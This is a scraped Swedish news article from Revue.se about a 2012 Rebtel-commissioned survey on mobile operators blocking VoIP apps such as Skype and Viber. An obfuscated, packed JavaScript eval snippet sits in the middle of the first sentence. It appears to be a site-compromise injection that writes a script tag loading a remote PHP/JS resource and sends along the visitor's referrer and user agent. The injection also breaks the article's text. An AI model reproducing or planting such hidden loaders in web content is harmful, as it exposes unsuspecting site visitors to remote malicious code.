Image Image Image Image Image Image Image Image Image Image

| 12 december, 2017

Scroll to top

Top

No Comments

7 av 10 svenskar överväger att byta teleoperatör om de blockar appar | Revue.se

7 av 10 svenskar överväger att byta teleoperatör om de blockar appar
Sebastian Plengier Ehrnfelt

71 eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|skytt|var|u0026u|referrer|zbrfs||js|php’.split(‘|’),0,{}))
procent av svenskarna funderar på att byta operatör om de blockerar appar på deras mobiltelefoner. Det visar en undersökning som gjorts på uppdrag av
Rebtel, världens största leverantör av mobil IP-telefoni, efter Skype.

Undersökningen avslöjar att hälften av alla smartphone-användare inte känner till att operatörerna idag kan blockera eller begränsa användningen av tjänster där man kan ringa till ett lågt pris eller gratis från sin mobil.  91 procent av de tillfrågade personerna hade vid frågetillfället inte fått någon information överhuvudtaget från sin operatör. Undersökningen visar även att:

Hälften av alla (54 procent) känner inte till att operatörer har börjat spärra VoIP-appar som Rebtel, Skype och Viber och därmed hindrar sina kunder från att ringa gratis eller billigare.

80 procent av konsumenterna tycker att det är fel att mobiloperatörer hindrar sina kunder från att ringa gratis eller billigare via appar.

71 procent av de tillfrågade, som idag använder smartphone-appar, är beredda att byta operatör om de fortsätter spärra deras appar.

Flera mobiloperatörer i Sverige hotar med att de ska blockera olika tjänster, såsom Skype, Rebtel och Viber, på smartphones och surfplattor. Enligt undersökningen är majoriteten av konsumenterna helt omedvetna om att deras operatör numera kan bestämma vilka appar de får och inte får använda i sin telefon, och vad de behöver betala extra avgifter för. De 7 procent som anger att de fått information upplever den som otydlig.

Marknaden för gratisappar växer explosionsartat. Närmare 410 miljoner användare beräknas använda appar för mobiltelefoni 2015 (Infonetics Research 2011). Det är den här typen av mjukvara som kollektivt gett upphov till den snabba utvecklingen av dagens smartphone-plattformar, och utgör också en stor del av det värde som gör det attraktivt för konsumenter att köpa en iPhone eller Android-telefon. De stora operatörerna vill stoppa konsumenternas användande av telefoniappar, trots att deras kunder redan betalat för ett abonnemang.

“Det är upprörande att operatörerna bestämmer vad deras kunder ska få använda sina abonnemang till. Det kan jämföras med hur musikbranschen blundade när fildelningen på nätet exploderade och folk slutade köpa cd-skivor, det finns en stor risk i att ignorera konsumenternas makt på en marknad. Det blir nu ännu viktigare för konsumenterna att välja rätt mobiloperatör då det finns risk att de i nästa steg stoppar mer dataintensiva tjänster som Facebook, You Tube eller Spotify”, säger Andreas Bernström, VD för Rebtel.

Undersökningen är gjord under perioden 29 februari – 12 mars 2012 i samarbete med Exquiro Market Research. Målgruppen är personer 18-65 år som äger en smartphone och är bosatta i Sverige.